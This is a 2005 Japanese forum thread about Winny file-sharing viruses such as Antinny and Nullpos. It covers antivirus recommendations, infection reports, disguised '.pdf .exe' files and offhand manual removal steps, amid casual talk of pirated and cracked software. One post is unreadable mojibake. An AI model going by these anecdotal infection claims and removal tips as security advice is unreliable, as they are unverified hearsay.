05/02/02 11:23:13 tigz0V5i0
ペン3のCPU866、メモリ256でOsがXP2なのですがそんな僕にぴったりのアンチウイルスは何にしたほうが良いのでしょうか??
ノートンを入れてみたのですが重過ぎて動けなくなりました・・・。つい先日までウイルスチャイサーの体験版を入れてましたがなかなか軽くてよかったです。
何か良いソフトありますか???
139:[名無し]さん(bin+cue).rar
05/02/02 11:24:10 HzBkuD0f0
プ、駆除できないからって怒るなよ貧乏人
140:[名無し]さん(bin+cue).rar
05/02/02 11:35:46 /Qe7zNhX0
>>138
Antiny対策ならNortonがいいよ。
圧縮ファイルの自動スキャンがどっかで切れるから、
それを切ればたぶん解決すると思う。バスターも同じこと。
別にAntiny対策じゃないっていうならフリーのが1番軽いと思う。AVGが特に。
ちなみにチェイサー、ドクター、キラー、NOD32とかが
どれくらい重い&良いかは自分は良く知らない、ごめん。
ただウイルスキラー北斗の拳?あれ1回使ったけど可愛い?よw
ソースネクストのやつは2ch的には最悪な評価だから避けるべき。
あそこ、サッサーの駆除ツールは可愛かったけどなぁ…。
141:[名無し]さん(bin+cue).rar
05/02/02 11:39:34 oKrLxS5z0
>>138
ワクチンはフリーでいいから、実メモリを増やしたほうがいい。
XPは512MBでようやく動く程度。256MBだとスワップしまくり
で重い&HDに負荷かかってるはず。
俺はAVGとBitDefenderの合わせ技。
142:[名無し]さん(bin+cue).rar
05/02/02 11:39:39 /Qe7zNhX0
>>138
書き忘れ…こればっかだ自分。
圧縮ファイルの自動スキャンを切ると確かに軽くはなるけど、
ちゃんと落としたファイルを手動スキャンかけてね。
143:[名無し]さん(bin+cue).rar
05/02/02 11:44:04 /Qe7zNhX0
>>141
BitDefenderってAntiny関係どの程度検出してくれる?
全体の検出率では確かNortonより上だったよねアレって。
144:[名無し]さん(bin+cue).rar
05/02/02 11:44:20 wvjKRml90
>>139
おまえさん新参者だな
だったら、このスレの過去ログ全部読んだほうがいいよ
過去に、ノートンやバスターを過信して感染した奴がどれだけいるか知っとけ
145:[名無し]さん(bin+cue).rar
05/02/02 11:47:03 wvjKRml90
>>143
スレ違いだっからこっちで聞いてくれ
【有料無料】アンチウイルスソフトPART3【問わず】
スレリンク(software板)
セキュリティ
URLリンク(pc5.2ch.net)
146:143
05/02/02 11:48:43 /Qe7zNhX0
>>145
了解です。
147:[名無し]さん(bin+cue).rar
05/02/02 12:53:02 7OsoSsnE0
>>143
ここも参照してみるよろし
フリーのアンチウイルスソフト Part5
スレリンク(sec板)
148:[名無し]さん(bin+cue).rar
05/02/02 13:19:12 S1OkAxtR0
マカ○ィ ダメぽ
149:[名無し]さん(bin+cue).rar
05/02/02 15:14:24 6tQrCdjO0
>>117
>>RARを見ただけで展開されてしまったようですね
WinRARで中身を見ただけで、感染したってこと?
ものすごく気になるんだが
150:[名無し]さん(bin+cue).rar
05/02/02 18:02:46 UBW9/GHX0
なにがなんだかわけわかめ
151:[名無し]さん(bin+cue).rar
05/02/02 18:10:12 S1OkAxtR0
RAR展開だけで感染は、普通あり得ないぞ。
脆弱性の存在する別の解凍ソフトも使ってるんだろう。
152:[名無し]さん(bin+cue).rar
05/02/02 18:16:40 tSM87j3H0
ヌルポースさえも、直接感染ではなくスタートアップに解凍する形だったのに
中身見ただけで感染は正直あり得ない
もしそんな形の脆弱性が有るなら、阿鼻叫喚の地獄絵図だな
153:[名無し]さん(bin+cue).rar
05/02/02 18:20:28 wvjKRml90
アーカイブの中身確認ではなく、プレビューってことか?
154:[名無し]さん(bin+cue).rar
05/02/02 18:21:40 jqI+Gi2b0
それはもう解凍ソフトの脆弱性を突く方法以外にあり得ないだろ。
そんなの狙うぐらいなら書庫に見せかけたexeとか中身にexeを混ぜておく方が現実的。
非効率的だからな。全ての解凍ソフトに共通の脆弱性が存在するなら別だが、そんなんまずないし。
155:[名無し]さん(bin+cue).rar
05/02/02 18:23:09 J34AE4bx0
どうせオコチャマが勘違いしただけだろ
156:[名無し]さん(bin+cue).rar
05/02/02 18:35:40 e3E5zl8M0
その通り
157:[名無し]さん(bin+cue).rar
05/02/02 18:43:44 KBYDaDbN0
たいてい「僕は何もしていないんですが」って言い訳してるけど、
正確には「僕は何も覚えていないんですが」なんだという現実。
158:[名無し]さん(bin+cue).rar
05/02/02 18:51:31 S1OkAxtR0
あと 自分の勝手な思いこみとかな
「たぶんこれが原因に違いない」と思いこんでるやつ
んで 自分の思いこみや勘違いを、他人に「これが本当なんだよ~」とわめいてるやつ
オマエきっちり確認してから話しろよって感じ
159:[名無し]さん(bin+cue).rar
05/02/02 18:58:13 xg+m25aC0
この前やっとやる気出してAVGをバージョンアップさせようとしたのですよ
6から7に
そんでもってコンパネからアンインストールしようと思って
やってみたんですが全然出来ないんですよ
変なダイアログが出て
何かコマンドプロンプトとか32bit的な事言われて
っで頭に来て本体ごと消してやるぜ
とか思ったんですよ
そしたらエクスプローラがハンドルしてくれちゃってるみたいなんですよ
そのお陰でセーフモードで起動してわざわざ消す羽目になったんですよ
っで次の問題がレジストリで
Reg何とかでレジストリ内をAVGで検索して
一個一個確かめながら消していったんですよ
楽しかったです
っでAVG7をダブルグリッコ
こうして無事にAVG7をインスコ出来たのでした
めでたしめでたし
160:[名無し]さん(bin+cue).rar
05/02/02 19:08:30 FGULgpsE0
おまいら釣られ杉!
161:[名無し]さん(bin+cue).rar
05/02/02 19:53:42 Y5vF+OHH0
>>158
エロ同人・漫画・ゲームをnyで落としまくった挙句
ヌルポに引っ掛かった知り合いがいたが、そいつ曰く
「怪しいファイルなんかクリックしてないって」の一点張り&最後は逆ギレだったな。
162:[名無し]さん(bin+cue).rar
05/02/02 19:56:18 wvjKRml90
>>159
俺は、6から7に上書きで無問題なんだが・・・
163:[名無し]さん(bin+cue).rar
05/02/02 20:05:41 UBW9/GHX0
>ダブルグリッコ
また流行らすんですか、そうですか
164:[名無し]さん(bin+cue).rar
05/02/02 20:09:05 VZXubXVJ0
キンタマ感染してるか知りたかったらレジストリエディタでも開いてみろよ
165:[名無し]さん(bin+cue).rar
05/02/02 20:12:02 6conA+ip0
_,.. ---- .._
,. '" `丶、
/ ` 、
,..-‐/ ...: ,ィ ,.i .∧ , ヽ.
. ,:' .l .::;',. :::;/..://:: /,':/ ', l、 .i ヽ
. ,' ..::| .::;',' :;:','フ'7フ''7/ ',.ト',_|, , ',.',
,' .::::::!'''l/!:;'/ /'゙ / '! ゙;:|:、.|、| 'l
. ,'. .:::::::{ l'.l/ 、_ _,. 'l/',|.';|
l :::::::::::';、ヾ  ̄ `‐-‐'/! ';. '
. ! :::::::::::/ `‐、 ゝ |'゙ |
| ::::::::/ \ 、_, _.,.,_ ノ::: ! みんながそろって
|::::/. _rl`': 、_ ///;ト,゙;:::::./
.. `´ /\\ `i;┬:////゙l゙l ヾ/ キンタマ感染しますように。
,.:く::::::::`:、\ 〉l゙:l / !.|
. /:.:.:.:\:.:.:.:.`:、ソ/:.:| | |
/.:.:.:.:.:.:.:.:.:\:.:.:.:У:.:;l /./
. /:.:.:.:.:.:.:.r'´`‐,`、:/.,.:‐{ | !`:、
,'.:.:.:.:.:.:.:.:.';_,゚.,ノ.:./,:':.:.:.:', | |`、:|
!:.:.:.:.:.:.:.:.:.:.゙、:.::/:.:.:.:.:.:.ヽ, / ,!:.:`、
166:[名無し]さん(bin+cue).rar
05/02/02 20:20:56 jqI+Gi2b0
苺キンタマの再来を望む
誰かあれの負荷軽減版をつくってくれw
167:[名無し]さん(bin+cue).rar
05/02/02 20:23:16 HzBkuD0f0
下痢が止まらないんですがどうしたらいいですか?
168:[名無し]さん(bin+cue).rar
05/02/02 20:28:40 THG0hmxe0
百草丸という薬がよく効くよ
169:[名無し]さん(bin+cue).rar
05/02/02 20:30:05 /kToNRYXO
>>167笑えばいいと思うよ
170:[名無し]さん(bin+cue).rar
05/02/02 20:58:51 HzBkuD0f0
ウィルス性のものはおっかないですね。水のような下痢がとまりmせんよ
171:[名無し]さん(bin+cue).rar
05/02/02 21:27:39 3xE1OYBQ0
つーかね。
最終手段でクリーンインスコしたわけよ。
そんで、溜めてたキャッシュ元に戻してwinny起動・・・・
キャッシュ消滅。
(゚Д゚)ハァ?
172:[名無し]さん(bin+cue).rar
05/02/02 21:57:55 2sLYPwSq0
>>170
国に帰るんだな・・・。おまえにも家族がいるだろう。
173:[名無し]さん(bin+cue).rar
05/02/02 23:28:46 mLNKyotv0
>>172
あぁジョン・クローリーね
174:[名無し]さん(bin+cue).rar
05/02/03 01:25:35 MbX/bgoA0
【設立】著作権管理団体【2ch】
ってウイルス警告でませんか?
2chでウイルス、、、
俺だけ?
175:[名無し]さん(bin+cue).rar
05/02/03 01:38:29 G75Rs66G0
>>173
おまいのせいで今頭の中で「レッグボマー!」のボイスが狂ったように繰り返されてる
176:[名無し]さん(bin+cue).rar
05/02/03 01:39:50 1sr4tK/t0
>>174
そりゃ大変だ
今すぐ新種のウイルス報告しなきゃ
177:[名無し]さん(bin+cue).rar
05/02/03 08:01:07 CDUJ+cwI0
>>117
こち亀.exeとDocuments and Settingsのフォルダが入っている.rarだと思うが
こち亀.exeがあやしいと解っていても、フォルダの方を見ていくと、5個目あたりのフォルダが
「マイドキュメント .exe」になっているので
それに気付かずに感染しているのでは?
178:[名無し]さん(bin+cue).rar
05/02/03 09:45:43 ij+1ioJe0
落としたファイルをチェックもしないで感染した~ って
騒いでるだけだな
179:[名無し]さん(bin+cue).rar
05/02/03 12:05:29 2sTTc6750
exeダブルクリックするのが癖なんだろ
180:[名無し]さん(bin+cue).rar
05/02/03 12:16:28 /ujUcoHb0
ベクターとかで落とすフリーソフトでも
ウイルスチェック位するご時世だろうになぁ…
181:76
05/02/03 12:18:20 vsD+5mhs0
>>77
テンプレ読んだけどファイアーウォールに関する記載って無いんだが('A`)
182:[名無し]さん(bin+cue).rar
05/02/03 13:03:02 YgnT2afe0
>>181
77じゃないけど…Winnyネットワーク上に放流するわけだから、
Winnyに対して通信拒否しない限りは、Antinyを防ぐことは不可能かと。
1部分だけ防ぐのは出来るんじゃないか。
nyと関係無いとこに情報発信するのについては。
183:[名無し]さん(bin+cue).rar
05/02/03 14:47:01 p6/KCI/u0
>>181
>>182の言う通りだろ。
FWは許可してない通信の遮断が基本だから、nyを使ってる以上は
ny自身が放流するファイルを遮断することはできない。テンプレ
読めってのは、感染しなければそんな心配しなくていいってことで
ないかと。
184:[名無し]さん(bin+cue).rar
05/02/03 15:29:36 YgnT2afe0
>>147
ってあぁ見逃し。どもです。
聞き方悪くあっちでスルーされてしまった…
まだ誰もやってなさそうだし、自分で実験してみるしかないかな。
185:184
05/02/03 15:31:43 YgnT2afe0
やってるじゃん。思い切り誘導先に書いてるじゃん。
もうほんと俺黙ってよう、決めた。
186:[名無し]さん(bin+cue).rar
05/02/03 15:45:32 WgMFwiP/0
てか、今の時代ルーターとセキュリティーソフト無しでネットやってる奴の気が知れないな
ルーター外して、数分間ネットしただけで
ms blastの攻撃→数え切れないほど
ポート叩き→数件
もあったし、どっちもノートン先生に弾かれたけど
187:[名無し]さん(bin+cue).rar
05/02/03 15:58:31 p6/KCI/u0
ウイルスで利益を出してる会社もあるから、共存共栄なんでない
かと。
188:[名無し]さん(bin+cue).rar
05/02/03 15:59:24 Ui4KERVT0
>>186
俺まっったく対策してないけど問題でもあるの?w
189:[名無し]さん(bin+cue).rar
05/02/03 18:40:01 Orqqmh9a0
>>177
avastでスキャンかけたらなぜか発動した(と思ってる)。orz
スタートアップから削除した後、窓の手起動して自動実行に空白の怪しいヤツがあるからそれを削除。
そこで再起動してもまたまた空白のミョーなものが出てきたので念のためctfmon.exeを自動実行させないように
レジストリいじったら消えた。
190:[名無し]さん(bin+cue).rar
05/02/03 18:56:40 ogaxbMW50
IDまで…ワロタw
191:[名無し]さん(bin+cue).rar
05/02/03 19:20:54 ggNDLq3N0
>>188
カコイイ!
とでも言われると思ったか?馬鹿か無知なだけだろ。
お前の個人情報が漏洩しようがOSが死のうが俺にはまっったく関係ないがなw
192:[名無し]さん(bin+cue).rar
05/02/03 19:24:07 Yjw6hzX10
>>188
そう遠くない将来、今の自分を呪う、未来のチミの姿が見えます。
193:[名無し]さん(bin+cue).rar
05/02/03 19:42:59 Sv9TSbU50
>>188
おまいのマシンが踏み台になってクラッキングが執り行われた場合、
おまいには未必の故意か軽くても重過失が問われる訳だが如何に?
194:[名無し]さん(bin+cue).rar
05/02/03 22:31:32 hr8s1njf0
うp、ダウン枠共に0の状態の時も、うpは思いっきり出てて、ダウンは2~3kの時が
しょっちゅうあるんだがコレは大丈夫?
つーか、なして? 別にキャッシュ見ても、自分で落としたファイルしかなくて
何も中継されてないし
195:[名無し]さん(bin+cue).rar
05/02/03 23:01:22 94WUufU80
アホは放置だな
196:[名無し]さん(bin+cue).rar
05/02/03 23:06:41 05LltVut0
>>194
それやばいぞ、新種のウイルスにそんな動きする奴があったような…
197:[名無し]さん(bin+cue).rar
05/02/03 23:08:15 hr8s1njf0
そげん事言わんと、不安な初心者に優しくしてケロ
何も落としても無いのに数百kbを何時間もupしてると、ちと不安
検索リンクでそんなに取られるとも思えんしなぁ・・・
198:[名無し]さん(bin+cue).rar
05/02/03 23:24:17 lI1zUbxO0
mellpoって何?
199:[名無し]さん(bin+cue).rar
05/02/03 23:40:09 KWC3+Ooj0
>>197
初心者なら黙って初期化&インスコするもんだ。
どうせ繋ぎっぱなしなら、おまいのユーザー名で詰め合わせが引っか
かったりしないかチェックしろ。
200:[名無し]さん(bin+cue).rar
05/02/03 23:59:27 Sv9TSbU50
>>197
不安な初心者なら>>1読んで鯉
しかる後に出て池
201:[名無し]さん(bin+cue).rar
05/02/04 00:27:56 k8zQZ7uD0
>>198
洒落版キンタマだったような希ガス。
俺も詳しいことは知らないけど。
202:[名無し]さん(bin+cue).rar
05/02/04 00:33:34 ErE4INQk0
知らぬが仏
203:[名無し]さん(bin+cue).rar
05/02/04 05:47:06 uhsvuFCJ0
UP0表示なんか信じるなよ
アウトバウンド殺しときゃ平気だからさ
204:[名無し]さん(bin+cue).rar
05/02/04 05:54:46 h1Pw28Us0
>>203
氏ね
205:76
05/02/04 10:43:41 tUU/uMYB0
>>182-183
すまん、キンタマ喰らったこと無いんで挙動について失念してた。
nyのアップフォルダにブツを置くんだよな。
206:76
05/02/04 10:48:20 tUU/uMYB0
待てよ
ってことはnyのフォルダにあらかじめupという名前のファイルを置いとけば防げる?
亜種が固定パス使えばアウトだろうけど。
207:[名無し]さん(bin+cue).rar
05/02/04 11:06:46 pqliEXCT0
「up」って名前のファイル置いとけば同名のフォルダは確かに作れないが、
UpFolder.txtからUPフォルダを検出するものがあるかもしれんし確実じゃないな
208:[名無し]さん(bin+cue).rar
05/02/04 12:51:32 AG8t4T6d0
>>206
:::::::::::/ ヽ::::::::::::
:::::::::::| ば じ き i::::::::::::
:::::::::::.ゝ か つ み ノ:::::::::::
:::::::::::/ だ に は イ:::::::::::::
::::: | な。 ゙i ::::::
\_ ,,-'
―--、..,ヽ__ _,,-''
:::::::,-‐、,‐、ヽ. )ノ _,,...-
:::::_|/ 。|。ヽ|-i、 ∠_:::::::::
/. ` ' ● ' ニ 、 ,-、ヽ|:::::::::
ニ __l___ノ |・ | |, -、::
/ ̄ _ | i ゚r ー' 6 |::
|( ̄`' )/ / ,.. i '-
`ー---―' / '(__ ) ヽ 、
====( i)==::::/ ,/ニニニ
:/ ヽ:::i /;;;;;;;;;;;;;;;;
209:[名無し]さん(bin+cue).rar
05/02/04 13:12:05 8BB6FK220
>>206
Antinnyのキモは情報漏洩より時限起動の上書きとかACCS砲だと思うんだがどうよ?
210:[名無し]さん(bin+cue).rar
05/02/04 13:36:38 Mvd6Ylzd0
>>209
まだほかにも隠し球があるかもしれんしな。
211:206
05/02/04 14:42:34 jf1a8hDs0
>>209
そんな機能があったのか
知らなかったよ。
212:[名無し]さん(bin+cue).rar
05/02/04 16:35:51 dyt11jkR0
頼むから落ち着いてくれ
213:[名無し]さん(bin+cue).rar
05/02/04 16:52:26 4w7YWTRQ0
昔パソコンの知識ないときnyやってて、exe?何だこれと思って普通にダブクリした(;´д`)
そしたら画面に時々血痕が映るようになって、あんま動作遅いからバスター入れて駆除してたんだ。
そしたら画面が血痕で真っ赤になってヌルポって浮き出てた。
データもバックアップ取ってないのにリカバリしちゃったし…orz
214:[名無し]さん(bin+cue).rar
05/02/04 17:10:02 2CoEtGn/0
>207
>UpFolder.txtからUPフォルダを検出するものがあるかもしれんし確実じゃないな
既にある。Gの亜種だったかな
215:[名無し]さん(bin+cue).rar
05/02/04 21:54:30 ovKbye/m0
既出ならスマソ。
友人がやられた。
十二国史とかいうアニメの外伝と謳ったpdfファイル、
ウイルスバスターで検知不可、開いた瞬間にPCが落ちる。
彼のPCはそのままクラッシュし、店に修理に出したそうな。
ご注意を。
216:[名無し]さん(bin+cue).rar
05/02/04 22:00:24 gYJFoMC20
きちんと因果関係を調べてからウィルスとか言えよ
217:[名無し]さん(bin+cue).rar
05/02/04 22:03:33 Nxs7vmfp0
自分のことを友達とか言うのもやめろよ。
218:[名無し]さん(bin+cue).rar
05/02/04 22:42:51 Oje0VabV0
クラスに一人はいたな、そういう奴。
屁こいても第一 発見者。
219:[名無し]さん(bin+cue).rar
05/02/04 23:08:23 tf2eoV5/0
> 、エテ擎ユ、」
・ョ・罕ー、ネ、キ、ォサラ、ィ、ト。ト
、ノ、ヲ、キ、ニ、ウ、ヲ・ヲ・、・�・ケ、ヒ、メ、テ、ォ、ォ、�ナロ、ヒクツ、テ、ニ
。ヨヒヘ、ャー妤テ、ォ、ォ、�、ッ、鬢、、ハ、タ、ォ、鯑カタ茹ケ。シ・ム。シソキキソ・ヲ・、・�・ケ、ヒー网、、ハ、、。ラ
。ヨ、゚、ハ、ヒキルケキ、ニ、「、イ、ハ、ュ、罍ラ
ナェ、ハサラケヘ、ケ、�、タ、惕ヲ、ォ。」
。ヨ。チ。チ、ハ、ヌ、ケ、ャ。「ソキキソ、ヌ、ケ、ォ、ヘ。ゥ。ラ
、ネ、ォ、筅荀ソ、鯆ソ、、、キ。」
、ネ、ォ。「クタヘユソャ、ネ、鬢ィ、ニニヘ、テ、ォ、ォ、テ、ニ、゚、�。」
ス熙ヌpdf、テ、ニ・゙・ッ・惕ネ、ォ、「、�、タ、テ、ア。ゥ
> ウォ、、、ソスヨエヨ、ヒPC、ャヘ釥チ、�。」
> 、ス、ホ、゙、゙・ッ・鬣テ・キ・�
、テ、ニ、タ、ア、タ、ネ・ヲ・、・�・ケ、ネ、マクタ、、タレ、�、ハ、、、隍ハ。」
220:[名無し]さん(bin+cue).rar
05/02/04 23:24:28 Nxs7vmfp0
>>219
読めねーよ。
221:[名無し]さん(bin+cue).rar
05/02/04 23:46:00 JZdC8rzC0
十二国史とかいうアニメ
222:[名無し]さん(bin+cue).rar
05/02/05 01:10:42 NDOkYjaD0
十二国記とかいうアニメ
223:[名無し]さん(bin+cue).rar
05/02/05 01:48:59 exbHemKn0
何でアニメの外伝でpdfなんだよ、そこからおかしいだろ
まぁ、pdfに偽装したホワイターかなんか踏んで、アボンしたんだろな
何が「ご注意を。」だか、笑わせるな。
お前ごときが出入りしていいスレじゃねーんだよ
224:[名無し]さん(bin+cue).rar
05/02/05 02:07:14 dDbuW0r80
>>220
> ご注意を。
ギャグとしか思えん……
どうしてこうウイルスにひっかかる奴に限って
「僕が引っかかるくらいなんだから超絶スーパー新型ウイルスに違いない」
「みんなに警告してあげなきゃ」
的な思考をするんだろうか。
「~~なんですが、新型ですかね?」
とかもやたら多いし。
とか、言葉尻をとらえて突っかかってみる。
所でpdfってマクロとかあるんだっけ?
> 開いた瞬間にPCが落ちる。
> そのままクラッシュ
ってだけだとウイルスとは言い切れないよな。
225:[名無し]さん(bin+cue).rar
05/02/05 02:28:32 bKWacowp0
「十二国記というアニメの原作小説の外伝」だろうな。
226:[名無し]さん(bin+cue).rar
05/02/05 02:37:06 RjFbOOZ20
ワロス
227:[名無し]さん(bin+cue).rar
05/02/05 11:08:43 Zsq8MkYu0
pdfのアイコンをした、
pdf .exe
228:[名無し]さん(bin+cue).rar
05/02/05 15:29:15 LOJlHRdy0
なかなかいかすな
俺もいつかひっかかりそうでこえー・・。
229:[名無し]さん(bin+cue).rar
05/02/05 15:32:04 vUfi5opH0
pdf ファイル 捨てたい
230:[名無し]さん(bin+cue).rar
05/02/05 15:38:06 QPX9pgds0
pdfを軽快に開くソフトないもんかね
Adobeウザ杉
231:[名無し]さん(bin+cue).rar
05/02/05 15:48:00 zoYqDu3R0
>>48
(一般コミック・雑誌) [ジャンプ] [2005-09] こちら葛飾区亀有公園前派出所.exe は Trojan.Nullpos に感染しています。
先生が対応したみたいでつね。
232:[名無し]さん(bin+cue).rar
05/02/05 15:57:20 qkk5vsyu0
テスト
233:[名無し]さん(bin+cue).rar
05/02/05 17:06:05 /cjGCeRp0
>>230
Adobe Reader 7は、起動時のもたつきがだいぶん軽減されたがな。
234:[名無し]さん(bin+cue).rar
05/02/05 17:32:10 AOqOF5bm0
そうか?
気づいてないだけ?
235:[名無し]さん(bin+cue).rar
05/02/05 18:12:02 KM2azlbW0
たぶん
十二国史.pdf .exe
だったんだろ
236:[名無し]さん(bin+cue).rar
05/02/05 22:07:58 0XXw+ljv0
【使用OS】Windows2000
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】なし
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンしたなら結果】できない
【Winnyのバージョン】ver.1.4
【Winny歴、総DL量】2年ぐらい、80G以上
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】実行できない
【症状、具体的に分かる限りすべて書く】
①Windows起動して、スタートアップメニュー読み込んだ後、固まる。
②タスクマネージャーのみ起動はできるけど、閉じれない。
③タスクマネージャーから終了しようとすると、
※「3d4」が反応していません。強制終了しますか?と、聞かれる。名前は「3f4」「444」と毎回変わる。
「explore」も反応しなくなる。
④ログオフはできるけど、再起動、終了はできない。
【何をしたらそんなことになったのか】
~.fcdをDeamonToolでisoに変換し、ダブルクリックしたら感染した。
ファイルの名前は失念。18禁麻雀ソフトだったことは覚えてる。
【これまでにとった措置】
①LANケーブルひっこぬいた。
②タスクマネージャー→プロセスで怪しい.exeを調べたがqttask.exeを切ったときだけ※の症状はなくなった。
③「3d4」をぐぐったけどわからず、qttaskは「Quick Time」関連でウイルスではなかった。
③セーフモードでもウイルスは動いた。
④Windowsの上書きインストールを実行したけど何も変わらず。
「AutoRun+Bat」か「仙台ギャラクシーエンジェルズ」ではないかと
思うのですが。どなたか対処方法教えてください・・・
237:[名無し]さん(bin+cue).rar
05/02/05 22:15:29 YDKFS92r0
クリーンインストール
238:[名無し]さん(bin+cue).rar
05/02/05 22:16:18 /cjGCeRp0
>>236
初期化+新規インスコ+ワクチンソフト買え。
以上。
239:[名無し]さん(bin+cue).rar
05/02/05 22:21:20 Y2rQl+Us0
つかVer.1.4って何だよ
2年も使ってるソフトのバージョンぐらい把握しとけ
ウィルス対策ソフトも入れてない香具師は滅んでよし
240:[名無し]さん(bin+cue).rar
05/02/05 23:08:51 GWfRLaGO0
そこまでいじったファイルの名前を失念するもんなのか
241:[名無し]さん(bin+cue).rar
05/02/05 23:15:07 3TUle1uh0
(´-`).。oO(恥ずかしいタイトルだから言いたくないんじゃないのか)
242:[名無し]さん(bin+cue).rar
05/02/05 23:20:52 0XXw+ljv0
>239
Ver1.14の間違いでした。
>240
本当に覚えてないんです。
Win32.Parite.2(W32.Pinfi, PE_PARITE.A)の症状と似ているので
亜種かもしれません。自分の場合は「ランダムな3文字.exe」なので。
URLリンク(www.viruschaser.jp)
243:[名無し]さん(bin+cue).rar
05/02/05 23:26:27 GgJQ+wLd0
>>242
お帰り下さいませ
244:[名無し]さん(bin+cue).rar
05/02/05 23:42:11 LN3/OJcd0
NISに苺キンタマの通信ログが残ってて
ワラタ
245:[名無し]さん(bin+cue).rar
05/02/05 23:42:40 0XXw+ljv0
お邪魔しました
246:[名無し]さん(bin+cue).rar
05/02/06 00:17:09 GpfgMHZv0
これを機会に足を洗うか、しっかりワクチン使うんだな。
既存のワクチンで検出できないやつを見つけたら、またおいで。
ここはそういうスレだ。
247:[名無し]さん(bin+cue).rar
05/02/06 00:55:18 E/R+Mbga0
>>230
まずは「Adobe 高速化」でぐぐれ。
オーケー、窓の社の紹介ページが出てきたな?
「Adobe Reader SpeedUp」これが君の探しているだろうソフトだ
あとは下でDLするだけって奴だ
URLリンク(www.tnk-bootblock.co.uk)
248:[名無し]さん(bin+cue).rar
05/02/06 01:06:41 Ep7PvuFL0
>>247
それ使ってたら印刷の際に不具合でた・・・OSがxpのヤシは
最新のやつにすりゃ軽いらしいが
249:[名無し]さん(bin+cue).rar
05/02/06 05:27:52 rJTqmXkQ0
欄検眼段、って何ですか?
おれが撮ったデジカメ画像がny上に流れてるみたい‥
250:[名無し]さん(bin+cue).rar
05/02/06 06:06:37 w/6Acw6k0
>>249
/ / ̄\ ヽ
/ | | ヽ \
/ .| .| \ ヽ
/ | | \ 丶
/ ノ ノ / 丶 |
| / / ヽ______ノ | アチャー
ヽ / / \ / |
ゝ / / \ / /
\ ノ ノ \/ ノ
251:[名無し]さん(bin+cue).rar
05/02/06 11:38:06 V3CzvDms0
キンタマの亜種新型か
ファイル名のパターンとトリップは統一されてるな
252:[名無し]さん(bin+cue).rar
05/02/06 12:53:56 H8CZ6kHC0
ふぅむ。新型か。
欄検眼段_D__画像_写真関係_写真_F0108.GJB 60HEmEokEq 318,346 64a9055168740465f5735f802fcd60ba
てな感じで流れてる奴か。
ドライブ名とかわかるのは面白いな。写真とかを優先して流してるのか?
まだ実物が手元にないんで推測だが、検索結果だと写真系がやたら目に付くな……
所で「欄検眼段」ってなんて読むんだ?
253:[名無し]さん(bin+cue).rar
05/02/06 12:59:23 r4ZkwkJg0
URLリンク(www.google.com)
なんだろう?
254:[名無し]さん(bin+cue).rar
05/02/06 13:04:05 BOAPM7X00
拡張子.GJBってなんだ?ぐぐっても分からんかった
255:[名無し]さん(bin+cue).rar
05/02/06 13:07:01 r4ZkwkJg0
>>254
極窓氏はなんとおっしゃった?
256:[名無し]さん(bin+cue).rar
05/02/06 13:08:19 NBdQ4BW90
Install.exe 24,576バイト プロパティの詳細→正式ファイル名STA.exe
が
(App)(アプリ)FINALDATA 3.0 特別復元版(認証クラックパッチ済み).zipfCXSpSVK4D4,616,349完全キャッシュ 60005/02/06 12:275369ca55d4c20558766dee0a760276abd
fCXSpSVK4D 369ca55d4c20558766dee0a760276abd
に入ってて不覚にも踏んだんだが何も起こらん
【使用OS】 XP Pro SP1
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 Norton
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 反応無し
【テンプレを読んだか】 読んだ
【これまでにとった措置】 レジストリを自分なりに確認
怖くて再起出来ねえ_| ̄|○
何かのウイルスなのか…?
257:[名無し]さん(bin+cue).rar
05/02/06 13:11:59 NBdQ4BW90
>>255
254じゃないけど極窓には対応していない形式みたいだな
258:[名無し]さん(bin+cue).rar
05/02/06 13:15:23 BOAPM7X00
>>255-257
今、極窓に入れてみた
Joint Photographic Coding Experts Group File「画像」EXIF形式
だってさ。変換したらjpg形式に変換されて中身見えたよ
259:[名無し]さん(bin+cue).rar
05/02/06 13:21:30 6OvmrX750
【合法】女性専用 カレを女みたいにイカせちゃおう!マニュアル 知っとけ.txt 2,053 204cb16508926a2b9253d2806a353c6a
やばいファイルらしいんですが…
260:[名無し]さん(bin+cue).rar
05/02/06 14:55:24 aoUba4KJ0
>>256
UpFolder.txtを書き換えてファイルを勝手にアップロードするタイプのようだ
レジストリのrunからIMJPlG.exeを削除
system32フォルダから当該ファイルを削除
upfolder.txtを元に戻す
勝手に作られたフォルダを削除
で大丈夫だと思う。多分。
261:[名無し]さん(bin+cue).rar
05/02/06 15:08:39 WL7dtHQv0
【使用OS】 XP
【WindowsUpdateしてるか】 今はしているけど感染時はしていなかった
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 今はしているけど感染時はしていなかった
【スキャンした結果(ウイルス名・発見場所)】 感染していなかったけど、ノートンをアップデートしていなかった
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 128MB以上のjpegファイルがすべて128MBに表示されて画像を見ることができなくなりました。ファイルのサイズは元のままです。
【何をしたらそんなことになったのか】 気がついた時にはなってました。winnyやってるので、落としたファイルを踏んだのだと思います。
【これまでにとった措置】 他の画像ソフトを試してみました。全滅です。
【その他の質問】 元にもどす方法があれば教えてください。デジカメで撮影した思い出の写真もあるので諦めきれません。
262:[名無し]さん(bin+cue).rar
05/02/06 15:09:28 mOjdOBQb0
デジカメキンタマ
mellpo
の情報キボンヌ
263:[名無し]さん(bin+cue).rar
05/02/06 15:20:16 McpvEx4g0
キャッシュにいつのまにかHTMLがいるんだが・・・・
やられちゃった?
264:[名無し]さん(bin+cue).rar
05/02/06 15:34:37 V3CzvDms0
>>261
削除されてるならともかく、多分上書きされてるから元に戻すのは不可能
しかし128MBとはまた大(クマー
>>263
知るか、ってかそれだけの情報でわかるか
気になるならまず自分で一通りのことをしろ
265:[名無し]さん(bin+cue).rar
05/02/06 15:38:48 WL7dtHQv0
>>264
うーん・・
ダメポですか
検索しても、それっぽい記事にあたらないんですよ。
珍しいウィルスなのかしら
すみません、128KBの間違いです。
100KBとか98KBのファイルは無事でした。
266:[名無し]さん(bin+cue).rar
05/02/06 16:06:11 YjUhjOkk0
バスターずっと使ってて先日ノートンに替えた・・・
そしてスキャンしてみた・・・
22個のウィルスが見つかりました。
先生すげぇぇぇ!!バスター市ね!!!
267:[名無し]さん(bin+cue).rar
05/02/06 16:37:04 mOjdOBQb0
>>264
ガッ
